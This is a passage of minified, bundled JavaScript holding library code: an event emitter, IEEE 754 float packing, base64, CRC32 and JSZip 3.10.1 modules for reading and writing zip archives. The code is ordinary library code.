w(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function x(ee,se,ve){var le={fired:!1,wrapFn:void 0,target:ee,type:se,listener:ve},ye=w.bind(le);return ye.listener=ve,le.wrapFn=ye,ye}function S(ee,se,ve){var le=ee._events;if(void 0===le)return[];var ye=le[se];return void 0===ye?[]:"function"==typeof ye?ve?[ye.listener||ye]:[ye]:ve?function(z){for(var l=new Array(z.length),f=0;f<l.length;++f)l[f]=z[f].listener||z[f];return l}(ye):U(ye,ye.length)}function O(ee){var se=this._events;if(void 0!==se){var ve=se[ee];if("function"==typeof ve)return 1;if(void 0!==ve)return ve.length}return 0}function U(ee,se){for(var ve=new Array(se),le=0;le<se;++le)ve[le]=ee[le];return ve}function K(ee,se,ve,le){if("function"==typeof ee.on)le.once?ee.once(se,ve):ee.on(se,ve);else{if("function"!=typeof ee.addEventListener)throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type '+typeof ee);ee.addEventListener(se,function ye(z){le.once&&ee.removeEventListener(se,ye),ve(z)})}}Object.defineProperty(_,"defaultMaxListeners",{enumerable:!0,get:function(){return y},set:function(ee){if("number"!=typeof ee||ee<0||b(ee))throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received '+ee+".");y=ee}}),_.init=function(){void 0!==this._events&&this._events!==Object.getPrototypeOf(this)._events||(this._events=Object.create(null),this._eventsCount=0),this._maxListeners=this._maxListeners||void 0},_.prototype.setMaxListeners=function(ee){if("number"!=typeof ee||ee<0||b(ee))throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received '+ee+".");return this._maxListeners=ee,this},_.prototype.getMaxListeners=function(){return p(this)},_.prototype.emit=function(ee){for(var se=[],ve=1;ve<arguments.length;ve++)se.push(arguments[ve]);var le="error"===ee,ye=this._events;if(void 0!==ye)le=le&&void 0===ye.error;else if(!le)return!1;if(le){var z;if(se.length>0&&(z=se[0]),z instanceof Error)throw z;var l=new Error("Unhandled error."+(z?" ("+z.message+")":""));throw l.context=z,l}var f=ye[ee];if(void 0===f)return!1;if("function"==typeof f)g(f,this,se);else{var A=f.length,v=U(f,A);for(ve=0;ve<A;++ve)g(v[ve],this,se)}return!0},_.prototype.on=_.prototype.addListener=function(ee,se){return D(this,ee,se,!1)},_.prototype.prependListener=function(ee,se){return D(this,ee,se,!0)},_.prototype.once=function(ee,se){return M(se),this.on(ee,x(this,ee,se)),this},_.prototype.prependOnceListener=function(ee,se){return M(se),this.prependListener(ee,x(this,ee,se)),this},_.prototype.off=_.prototype.removeListener=function(ee,se){var ve,le,ye,z,l;if(M(se),void 0===(le=this._events))return this;if(void 0===(ve=le[ee]))return this;if(ve===se||ve.listener===se)0==--this._eventsCount?this._events=Object.create(null):(delete le[ee],le.removeListener&&this.emit("removeListener",ee,ve.listener||se));else if("function"!=typeof ve){for(ye=-1,z=ve.length-1;z>=0;z--)if(ve[z]===se||ve[z].listener===se){l=ve[z].listener,ye=z;break}if(ye<0)return this;0===ye?ve.shift():function(f,A){for(;A+1<f.length;A++)f[A]=f[A+1];f.pop()}(ve,ye),1===ve.length&&(le[ee]=ve[0]),void 0!==le.removeListener&&this.emit("removeListener",ee,l||se)}return this},_.prototype.removeAllListeners=function(ee){var se,ve,le;if(void 0===(ve=this._events))return this;if(void 0===ve.removeListener)return 0===arguments.length?(this._events=Object.create(null),this._eventsCount=0):void 0!==ve[ee]&&(0==--this._eventsCount?this._events=Object.create(null):delete ve[ee]),this;if(0===arguments.length){var ye,z=Object.keys(ve);for(le=0;le<z.length;++le)"removeListener"!==(ye=z[le])&&this.removeAllListeners(ye);return this.removeAllListeners("removeListener"),this._events=Object.create(null),this._eventsCount=0,this}if("function"==typeof(se=ve[ee]))this.removeListener(ee,se);else if(void 0!==se)for(le=se.length-1;le>=0;le--)this.removeListener(ee,se[le]);return this},_.prototype.listeners=function(ee){return S(this,ee,!0)},_.prototype.rawListeners=function(ee){return S(this,ee,!1)},_.listenerCount=function(ee,se){return"function"==typeof ee.listenerCount?ee.listenerCount(se):O.call(ee,se)},_.prototype.listenerCount=O,_.prototype.eventNames=function(){return this._eventsCount>0?F(this._events):[]}},645:(Q,F)=>{F.read=function(E,g,b,_,y){var M,p,D=8*y-_-1,w=(1<<D)-1,x=w>>1,S=-7,O=b?y-1:0,U=b?-1:1,K=E[g+O];for(O+=U,M=K&(1<<-S)-1,K>>=-S,S+=D;S>0;M=256*M+E[g+O],O+=U,S-=8);for(p=M&(1<<-S)-1,M>>=-S,S+=_;S>0;p=256*p+E[g+O],O+=U,S-=8);if(0===M)M=1-x;else{if(M===w)return p?NaN:1/0*(K?-1:1);p+=Math.pow(2,_),M-=x}return(K?-1:1)*p*Math.pow(2,M-_)},F.write=function(E,g,b,_,y,M){var p,D,w,x=8*M-y-1,S=(1<<x)-1,O=S>>1,U=23===y?Math.pow(2,-24)-Math.pow(2,-77):0,K=_?0:M-1,ee=_?1:-1,se=g<0||0===g&&1/g<0?1:0;for(g=Math.abs(g),isNaN(g)||g===1/0?(D=isNaN(g)?1:0,p=S):(p=Math.floor(Math.log(g)/Math.LN2),g*(w=Math.pow(2,-p))<1&&(p--,w*=2),(g+=p+O>=1?U/w:U*Math.pow(2,1-O))*w>=2&&(p++,w/=2),p+O>=S?(D=0,p=S):p+O>=1?(D=(g*w-1)*Math.pow(2,y),p+=O):(D=g*Math.pow(2,O-1)*Math.pow(2,y),p=0));y>=8;E[b+K]=255&D,K+=ee,D/=256,y-=8);for(p=p<<y|D,x+=y;x>0;E[b+K]=255&p,K+=ee,p/=256,x-=8);E[b+K-ee]|=128*se}},5705:(Q,F,E)=>{"use strict";var g,b,_=E.g.MutationObserver||E.g.WebKitMutationObserver;if(_){var y=0,M=new _(x),p=E.g.document.createTextNode("");M.observe(p,{characterData:!0}),g=function(){p.data=y=++y%2}}else if(E.g.setImmediate||void 0===E.g.MessageChannel)g="document"in E.g&&"onreadystatechange"in E.g.document.createElement("script")?function(){var S=E.g.document.createElement("script");S.onreadystatechange=function(){x(),S.onreadystatechange=null,S.parentNode.removeChild(S),S=null},E.g.document.documentElement.appendChild(S)}:function(){setTimeout(x,0)};else{var D=new E.g.MessageChannel;D.port1.onmessage=x,g=function(){D.port2.postMessage(0)}}var w=[];function x(){var S,O;b=!0;for(var U=w.length;U;){for(O=w,w=[],S=-1;++S<U;)O[S]();U=w.length}b=!1}Q.exports=function(S){1!==w.push(S)||b||g()}},5717:Q=>{Q.exports="function"==typeof Object.create?function(F,E){E&&(F.super_=E,F.prototype=Object.create(E.prototype,{constructor:{value:F,enumerable:!1,writable:!0,configurable:!0}}))}:function(F,E){if(E){F.super_=E;var g=function(){};g.prototype=E.prototype,F.prototype=new g,F.prototype.constructor=F}}},8458:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3790),_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";F.encode=function(y){for(var M,p,D,x,S,O,U=[],K=0,ee=y.length,se=ee,ve="string"!==g.getTypeOf(y);K<y.length;)se=ee-K,ve?(M=y[K++],p=K<ee?y[K++]:0,D=K<ee?y[K++]:0):(M=y.charCodeAt(K++),p=K<ee?y.charCodeAt(K++):0,D=K<ee?y.charCodeAt(K++):0),x=(3&M)<<4|p>>4,S=se>1?(15&p)<<2|D>>6:64,O=se>2?63&D:64,U.push(_.charAt(M>>2)+_.charAt(x)+_.charAt(S)+_.charAt(O));return U.join("")},F.decode=function(y){var M,p,D,w,x,S,O=0,U=0,K="data:";if(y.substr(0,K.length)===K)throw new Error("Invalid base64 input, it looks like a data url.");var ee,se=3*(y=y.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(y.charAt(y.length-1)===_.charAt(64)&&se--,y.charAt(y.length-2)===_.charAt(64)&&se--,se%1!=0)throw new Error("Invalid base64 input, bad content length.");for(ee=b.uint8array?new Uint8Array(0|se):new Array(0|se);O<y.length;)M=_.indexOf(y.charAt(O++))<<2|(w=_.indexOf(y.charAt(O++)))>>4,p=(15&w)<<4|(x=_.indexOf(y.charAt(O++)))>>2,D=(3&x)<<6|(S=_.indexOf(y.charAt(O++))),ee[U++]=M,64!==x&&(ee[U++]=p),64!==S&&(ee[U++]=D);return ee}},7326:(Q,F,E)=>{"use strict";var g=E(8565),b=E(5301),_=E(2541),y=E(5977);function M(p,D,w,x,S){this.compressedSize=p,this.uncompressedSize=D,this.crc32=w,this.compression=x,this.compressedContent=S}M.prototype={getContentWorker:function(){var p=new b(g.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new y("data_length")),D=this;return p.on("end",function(){if(this.streamInfo.data_length!==D.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),p},getCompressedWorker:function(){return new b(g.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},M.createWorkerFrom=function(p,D,w){return p.pipe(new _).pipe(new y("uncompressedSize")).pipe(D.compressWorker(w)).pipe(new y("compressedSize")).withStreamInfo("compression",D)},Q.exports=M},1678:(Q,F,E)=>{"use strict";var g=E(3718);F.STORE={magic:"\0\0",compressWorker:function(){return new g("STORE compression")},uncompressWorker:function(){return new g("STORE decompression")}},F.DEFLATE=E(1033)},6988:(Q,F,E)=>{"use strict";var g=E(8910),b=function(){for(var _,y=[],M=0;M<256;M++){_=M;for(var p=0;p<8;p++)_=1&_?3988292384^_>>>1:_>>>1;y[M]=_}return y}();Q.exports=function(_,y){return void 0!==_&&_.length?"string"!==g.getTypeOf(_)?function(M,p,D,w){var x=b,S=0+D;M^=-1;for(var O=0;O<S;O++)M=M>>>8^x[255&(M^p[O])];return-1^M}(0|y,_,_.length):function(M,p,D,w){var x=b,S=0+D;M^=-1;for(var O=0;O<S;O++)M=M>>>8^x[255&(M^p.charCodeAt(O))];return-1^M}(0|y,_,_.length):0}},6032:(Q,F)=>{"use strict";F.base64=!1,F.binary=!1,F.dir=!1,F.createFolders=!0,F.date=null,F.compression=null,F.compressionOptions=null,F.comment=null,F.unixPermissions=null,F.dosPermissions=null},8565:(Q,F,E)=>{"use strict";var g;g="undefined"!=typeof Promise?Promise:E(3389),Q.exports={Promise:g}},1033:(Q,F,E)=>{"use strict";var g="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,b=E(9591),_=E(8910),y=E(3718),M=g?"uint8array":"array";function p(D,w){y.call(this,"FlateWorker/"+D),this._pako=null,this._pakoAction=D,this._pakoOptions=w,this.meta={}}F.magic="\b\0",_.inherits(p,y),p.prototype.processChunk=function(D){this.meta=D.meta,null===this._pako&&this._createPako(),this._pako.push(_.transformTo(M,D.data),!1)},p.prototype.flush=function(){y.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},p.prototype.cleanUp=function(){y.prototype.cleanUp.call(this),this._pako=null},p.prototype._createPako=function(){this._pako=new b[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var D=this;this._pako.onData=function(w){D.push({data:w,meta:D.meta})}},F.compressWorker=function(D){return new p("Deflate",D)},F.uncompressWorker=function(){return new p("Inflate",{})}},4979:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718),_=E(3600),y=E(6988),M=E(1141),p=function(S,O){var U,K="";for(U=0;U<O;U++)K+=String.fromCharCode(255&S),S>>>=8;return K},D=function(S,O,U,K,ee,se){var ve,le,ye=S.file,z=S.compression,l=se!==_.utf8encode,f=g.transformTo("string",se(ye.name)),A=g.transformTo("string",_.utf8encode(ye.name)),v=ye.comment,P=g.transformTo("string",se(v)),G=g.transformTo("string",_.utf8encode(v)),X=A.length!==ye.name.length,L=G.length!==v.length,h="",R="",J="",Z=ye.dir,ue=ye.date,Ie={crc32:0,compressedSize:0,uncompressedSize:0};O&&!U||(Ie.crc32=S.crc32,Ie.compressedSize=S.compressedSize,Ie.uncompressedSize=S.uncompressedSize);var Ae=0;O&&(Ae|=8),l||!X&&!L||(Ae|=2048);var Ue,Xe,He=0,Be=0;Z&&(He|=16),"UNIX"===ee?(Be=798,He|=(Xe=Ue=ye.unixPermissions,Ue||(Xe=Z?16893:33204),(65535&Xe)<<16)):(Be=20,He|=63&(ye.dosPermissions||0)),ve=ue.getUTCHours(),ve<<=6,ve|=ue.getUTCMinutes(),ve<<=5,ve|=ue.getUTCSeconds()/2,le=ue.getUTCFullYear()-1980,le<<=4,le|=ue.getUTCMonth()+1,le<<=5,le|=ue.getUTCDate(),X&&(R=p(1,1)+p(y(f),4)+A,h+="up"+p(R.length,2)+R),L&&(J=p(1,1)+p(y(P),4)+G,h+="uc"+p(J.length,2)+J);var qe="";return qe+="\n\0",qe+=p(Ae,2),qe+=z.magic,qe+=p(ve,2),qe+=p(le,2),qe+=p(Ie.crc32,4),qe+=p(Ie.compressedSize,4),qe+=p(Ie.uncompressedSize,4),qe+=p(f.length,2),qe+=p(h.length,2),{fileRecord:M.LOCAL_FILE_HEADER+qe+f+h,dirRecord:M.CENTRAL_FILE_HEADER+p(Be,2)+qe+p(P.length,2)+"\0\0\0\0"+p(He,4)+p(K,4)+f+h+P}},w=function(S){return M.DATA_DESCRIPTOR+p(S.crc32,4)+p(S.compressedSize,4)+p(S.uncompressedSize,4)};function x(S,O,U,K){b.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=O,this.zipPlatform=U,this.encodeFileName=K,this.streamFiles=S,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}g.inherits(x,b),x.prototype.push=function(S){var O=S.meta.percent||0,U=this.entriesCount,K=this._sources.length;this.accumulate?this.contentBuffer.push(S):(this.bytesWritten+=S.data.length,b.prototype.push.call(this,{data:S.data,meta:{currentFile:this.currentFile,percent:U?(O+100*(U-K-1))/U:100}}))},x.prototype.openedSource=function(S){this.currentSourceOffset=this.bytesWritten,this.currentFile=S.file.name;var O=this.streamFiles&&!S.file.dir;if(O){var U=D(S,O,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:U.fileRecord,meta:{percent:0}})}else this.accumulate=!0},x.prototype.closedSource=function(S){this.accumulate=!1;var O=this.streamFiles&&!S.file.dir,U=D(S,O,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(U.dirRecord),O)this.push({data:w(S),meta:{percent:100}});else for(this.push({data:U.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},x.prototype.flush=function(){for(var S=this.bytesWritten,O=0;O<this.dirRecords.length;O++)this.push({data:this.dirRecords[O],meta:{percent:100}});var ee,se,ve,z,K=(ee=this.dirRecords.length,se=this.bytesWritten-S,ve=S,z=g.transformTo("string",(0,this.encodeFileName)(this.zipComment)),M.CENTRAL_DIRECTORY_END+"\0\0\0\0"+p(ee,2)+p(ee,2)+p(se,4)+p(ve,4)+p(z.length,2)+z);this.push({data:K,meta:{percent:100}})},x.prototype.prepareNextSource=function(){this.previous=this._sources.shift(),this.openedSource(this.previous.streamInfo),this.isPaused?this.previous.pause():this.previous.resume()},x.prototype.registerPrevious=function(S){this._sources.push(S);var O=this;return S.on("data",function(U){O.processChunk(U)}),S.on("end",function(){O.closedSource(O.previous.streamInfo),O._sources.length?O.prepareNextSource():O.end()}),S.on("error",function(U){O.error(U)}),this},x.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(!this.previous&&this._sources.length?(this.prepareNextSource(),!0):this.previous||this._sources.length||this.generatedError?void 0:(this.end(),!0))},x.prototype.error=function(S){var O=this._sources;if(!b.prototype.error.call(this,S))return!1;for(var U=0;U<O.length;U++)try{O[U].error(S)}catch(K){}return!0},x.prototype.lock=function(){b.prototype.lock.call(this);for(var S=this._sources,O=0;O<S.length;O++)S[O].lock()},Q.exports=x},7834:(Q,F,E)=>{"use strict";var g=E(1678),b=E(4979);F.generateWorker=function(_,y,M){var p=new b(y.streamFiles,M,y.platform,y.encodeFileName),D=0;try{_.forEach(function(w,x){D++;var S=function(ee,se){var ve=ee||se,le=g[ve];if(!le)throw new Error(ve+" is not a valid compression method !");return le}(x.options.compression,y.compression),U=x.dir,K=x.date;x._compressWorker(S,x.options.compressionOptions||y.compressionOptions||{}).withStreamInfo("file",{name:w,dir:U,date:K,comment:x.comment||"",unixPermissions:x.unixPermissions,dosPermissions:x.dosPermissions}).pipe(p)}),p.entriesCount=D}catch(w){p.error(w)}return p}},6085:(Q,F,E)=>{"use strict";function g(){if(!(this instanceof g))return new g;if(arguments.length)throw new Error("The constructor with parameters has been removed in JSZip 3.0, please check the upgrade guide.");this.files=Object.create(null),this.comment=null,this.root="",this.clone=function(){var b=new g;for(var _ in this)"function"!=typeof this[_]&&(b[_]=this[_]);return b}}(g.prototype=E(7132)).loadAsync=E(1062),g.support=E(3790),g.defaults=E(6032),g.version="3.10.1",g.loadAsync=function(b,_){return(new g).loadAsync(b,_)},g.external=E(8565),Q.exports=g},1062:(Q,F,E)=>{"use strict";var g=E(8910),b=E(8565),_=E(3600),y=E(6624),M=E(2541),p=E(2182);function D(w){return new b.Promise(function(x,S){var O=w.decompressed.getContentWorker().pipe(new M);O.on("error",function(U){S(U)}).on("end",function(){O.streamInfo.crc32!==w.decompressed.crc32?S(new Error("Corrupted zip : CRC32 mismatch")):x()}).resume()})}Q.exports=function(w,x){var S=this;return x=g.extend(x||{},{base64:!1,checkCRC32:!1,optimizedBinaryString:!1,createFolders:!1,decodeFileName:_.utf8decode}),p.isNode&&p.isStream(w)?b.Promise.reject(new Error("JSZip can't accept a stream when loading a zip file.")):g.prepareContent("the loaded zip file",w,!0,x.optimizedBinaryString,x.base64).then(function(O){var U=new y(x);return U.load(O),U}).then(function(O){var U=[b.Promise.resolve(O)],K=O.files;if(x.checkCRC32)for(var ee=0;ee<K.length;ee++)U.push(D(K[ee]));return b.Promise.all(U)}).then(function(O){for(var U=O.shift(),K=U.files,ee=0;ee<K.length;ee++){var se=K[ee],ve=se.fileNameStr,le=g.resolve(se.fileNameStr);S.file(le,se.decompressed,{binary:!0,optimizedBinaryString:!0,date:se.date,dir:se.dir,comment:se.fileCommentStr.length?se.fileCommentStr:null,unixPermissions:se.unixPermissions,dosPermissions:se.dosPermissions,createFolders:x.createFolders}),se.dir||(S.file(le).unsafeOriginalName=ve)}return U.zipComment.length&&(S.comment=U.zipComment),S})}},660:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y,M){b.call(this,"Nodejs stream input adapter for "+y),this._upstreamEnded=!1,this._bindStream(M)}g.inherits(_,b),_.prototype._bindStream=function(y){var M=this;this._stream=y,y.pause(),y.on("data",function(p){M.push({data:p,meta:{percent:0}})}).on("error",function(p){M.isPaused?this.generatedError=p:M.error(p)}).on("end",function(){M.isPaused?M._upstreamEnded=!0:M.end()})},_.prototype.pause=function(){return!!b.prototype.pause.call(this)&&(this._stream.pause(),!0)},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(this._upstreamEnded?this.end():this._stream.resume(),!0)},Q.exports=_},1220:(Q,F,E)=>{"use strict";var g=E(749).Readable;function b(_,y,M){g.call(this,y),this._helper=_;var p=this;_.on("data",function(D,w){p.push(D)||p._helper.pause(),M&&M(w)}).on("error",function(D){p.emit("error",D)}).on("end",function(){p.push(null)})}E(8910).inherits(b,g),b.prototype._read=function(){this._helper.resume()},Q.exports=b},2182:Q=>{"use strict";Q.exports={isNode:void 0!==ie,newBufferFrom:function(F,E){if(ie.from&&ie.from!==Uint8Array.from)return ie.from(F,E);if("number"==typeof F)throw new Error('The "data" argument must not be a number');return new ie(F,E)},allocBuffer:function(F){if(ie.alloc)return ie.alloc(F);var E=new ie(F);return E.fill(0),E},isBuffer:function(F){return ie.isBuffer(F)},isStream:function(F){return F&&"function"==typeof F.on&&"function"==typeof F.pause&&"function"==typeof F.resume}}},7132:(Q,F,E)=>{"use strict";var g=E(3600),b=E(8910),_=E(3718),y=E(1285),M=E(6032),p=E(7326),D=E(6859),w=E(7834),x=E(2182),S=E(660),O=function(le,ye,z){var l,P,f=b.getTypeOf(ye),A=b.extend(z||{},M);A.date=A.date||new Date,null!==A.compression&&(A.compression=A.compression.toUpperCase()),"string"==typeof A.unixPermissions&&(A.unixPermissions=parseInt(A.unixPermissions,8)),A.unixPermissions&&16384&A.unixPermissions&&(A.dir=!0),A.dosPermissions&&16&A.dosPermissions&&(A.dir=!0),A.dir&&(le=K(le)),A.createFolders&&(l=U(le))&&ee.call(this,l,!0),z&&void 0!==z.binary||(A.binary=!("string"===f&&!1===A.binary&&!1===A.base64)),(ye instanceof p&&0===ye.uncompressedSize||A.dir||!ye||0===ye.length)&&(A.base64=!1,A.binary=!0,ye="",A.compression="STORE",f="string"),P=ye instanceof p||ye instanceof _?ye:x.isNode&&x.isStream(ye)?new S(le,ye):b.prepareContent(le,ye,A.binary,A.optimizedBinaryString,A.base64);var G=new D(le,P,A);this.files[le]=G},U=function(le){"/"===le.slice(-1)&&(le=le.substring(0,le.length-1));var ye=le.lastIndexOf("/");return ye>0?le.substring(0,ye):""},K=function(le){return"/"!==le.slice(-1)&&(le+="/"),le},ee=function(le,ye){return ye=void 0!==ye?ye:M.createFolders,le=K(le),this.files[le]||O.call(this,le,null,{dir:!0,createFolders:ye}),this.files[le]};function se(le){return"[object RegExp]"===Object.prototype.toString.call(le)}var ve={load:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},forEach:function(le){var ye,z,l;for(ye in this.files)l=this.files[ye],(z=ye.slice(this.root.length,ye.length))&&ye.slice(0,this.root.length)===this.root&&le(z,l)},filter:function(le){var ye=[];return this.forEach(function(z,l){le(z,l)&&ye.push(l)}),ye},file:function(le,ye,z){if(1===arguments.length){if(se(le)){var l=le;return this.filter(function(A,v){return!v.dir&&l.test(A)})}var f=this.files[this.root+le];return f&&!f.dir?f:null}return O.call(this,le=this.root+le,ye,z),this},folder:function(le){if(!le)return this;if(se(le))return this.filter(function(f,A){return A.dir&&le.test(f)});var z=ee.call(this,this.root+le),l=this.clone();return l.root=z.name,l},remove:function(le){var ye=this.files[le=this.root+le];if(ye||("/"!==le.slice(-1)&&(le+="/"),ye=this.files[le]),ye&&!ye.dir)delete this.files[le];else for(var z=this.filter(function(f,A){return A.name.slice(0,le.length)===le}),l=0;l<z.length;l++)delete this.files[z[l].name];return this},generate:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},generateInternalStream:function(le){var ye,z={};try{if((z=b.extend(le||{},{streamFiles:!1,compression:"STORE",compressionOptions:null,type:"",platform:"DOS",comment:null,mimeType:"application/zip",encodeFileName:g.utf8encode})).type=z.type.toLowerCase(),z.compression=z.compression.toUpperCase(),"binarystring"===z.type&&(z.type="string"),!z.type)throw new Error("No output type specified.");b.checkSupport(z.type),"darwin"!==z.platform&&"freebsd"!==z.platform&&"linux"!==z.platform&&"sunos"!==z.platform||(z.platform="UNIX"),"win32"===z.platform&&(z.platform="DOS"),ye=w.generateWorker(this,z,z.comment||this.comment||"")}catch(f){(ye=new _("error")).error(f)}return new y(ye,z.type||"string",z.mimeType)},generateAsync:function(le,ye){return this.generateInternalStream(le).accumulate(ye)},generateNodeStream:function(le,ye){return(le=le||{}).type||(le.type="nodebuffer"),this.generateInternalStream(le).toNodejsStream(ye)}};Q.exports=ve},749:(Q,F,E)=>{"use strict";Q.exports=E(2830)},2370:(Q,F,E)=>{"use strict";var g=E(8542);function b(_){g.call(this,_);for(var y=0;y<this.data.length;y++)_[y]=255&_[y]}E(8910).inherits(b,g),b.prototype.byteAt=function(_){return this.data[this.zero+_]},b.prototype.lastIndexOfSignature=function(_){for(var y=_.charCodeAt(0),M=_.charCodeAt(1),p=_.charCodeAt(2),D=_.charCodeAt(3),w=this.length-4;w>=0;--w)if(this.data[w]===y&&this.data[w+1]===M&&this.data[w+2]===p&&this.data[w+3]===D)return w-this.zero;return-1},b.prototype.readAndCheckSignature=function(_){var y=_.charCodeAt(0),M=_.charCodeAt(1),p=_.charCodeAt(2),D=_.charCodeAt(3),w=this.readData(4);return y===w[0]&&M===w[1]&&p===w[2]&&D===w[3]},b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return[];var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},8542:(Q,F,E)=>{"use strict";var g=E(8910);function b(_){this.data=_,this.length=_.length,this.index=0,this.zero=0}b.prototype={checkOffset:function(_){this.checkIndex(this.index+_)},checkIndex:function(_){if(this.length<this.zero+_||_<0)throw new Error("End of data reached (data length = "+this.length+", asked index = "+_+"). Corrupted zip ?")},setIndex:function(_){this.checkIndex(_),this.index=_},skip:function(_){this.setIndex(this.index+_)},byteAt:function(){},readInt:function(_){var y,M=0;for(this.checkOffset(_),y=this.index+_-1;y>=this.index;y--)M=(M<<8)+this.byteAt(y);return this.index+=_,M},readString:function(_){return g.transformTo("string",this.readData(_))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var _=this.readInt(4);return new Date(Date.UTC(1980+(_>>25&127),(_>>21&15)-1,_>>16&31,_>>11&31,_>>5&63,(31&_)<<1))}},Q.exports=b},9583:(Q,F,E)=>{"use strict";var g=E(414);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},9226:(Q,F,E)=>{"use strict";var g=E(8542);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.byteAt=function(_){return this.data.charCodeAt(this.zero+_)},b.prototype.lastIndexOfSignature=function(_){return this.data.lastIndexOf(_)-this.zero},b.prototype.readAndCheckSignature=function(_){return _===this.readData(4)},b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},414:(Q,F,E)=>{"use strict";var g=E(2370);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return new Uint8Array(0);var y=this.data.subarray(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},8435:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3790),_=E(2370),y=E(9226),M=E(9583),p=E(414);Q.exports=function(D){var w=g.getTypeOf(D);return g.checkSupport(w),"string"!==w||b.uint8array?"nodebuffer"===w?new M(D):b.uint8array?new p(g.transformTo("uint8array",D)):new _(g.transformTo("array",D)):new y(D)}},1141:(Q,F)=>{"use strict";F.LOCAL_FILE_HEADER="PK\x03\x04",F.CENTRAL_FILE_HEADER="PK\x01\x02",F.CENTRAL_DIRECTORY_END="PK\x05\x06",F.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",F.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",F.DATA_DESCRIPTOR="PK\x07\b"},4293:(Q,F,E)=>{"use strict";var g=E(3718),b=E(8910);function _(y){g.call(this,"ConvertWorker to "+y),this.destType=y}b.inherits(_,g),_.prototype.processChunk=function(y){this.push({data:b.transformTo(this.destType,y.data),meta:y.meta})},Q.exports=_},2541:(Q,F,E)=>{"use strict";var g=E(3718),b=E(6988);function _(){g.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}E(8910).inherits(_,g),_.prototype.processChunk=function(y){this.streamInfo.crc32=b(y.data,this.streamInfo.crc32||0),this.push(y)},Q.exports=_},5977:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y){b.call(this,"DataLengthProbe for "+y),this.propName=y,this.withStreamInfo(y,0)}g.inherits(_,b),_.prototype.processChunk=function(y){y&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+y.data.length),b.prototype.processChunk.call(this,y)},Q.exports=_},5301:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y){b.call(this,"DataWorker");var M=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,y.then(function(p){M.dataIsReady=!0,M.data=p,M.max=p&&p.length||0,M.type=g.getTypeOf(p),M.isPaused||M._tickAndRepeat()},function(p){M.error(p)})}g.inherits(_,b),_.prototype.cleanUp=function(){b.prototype.cleanUp.call(this),this.data=null},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,g.delay(this._tickAndRepeat,[],this)),!0)},_.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||(g.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},_.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var y=null,M=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":y=this.data.substring(this.index,M);break;case"uint8array":y=this.data.subarray(this.index,M);break;case"array":case"nodebuffer":y=this.data.slice(this.index,M)}return this.index=M,this.push({data:y,meta:{percent:this.max?this.index/this.max*100:0}})},Q.exports=_},3718:Q=>{"use strict";function 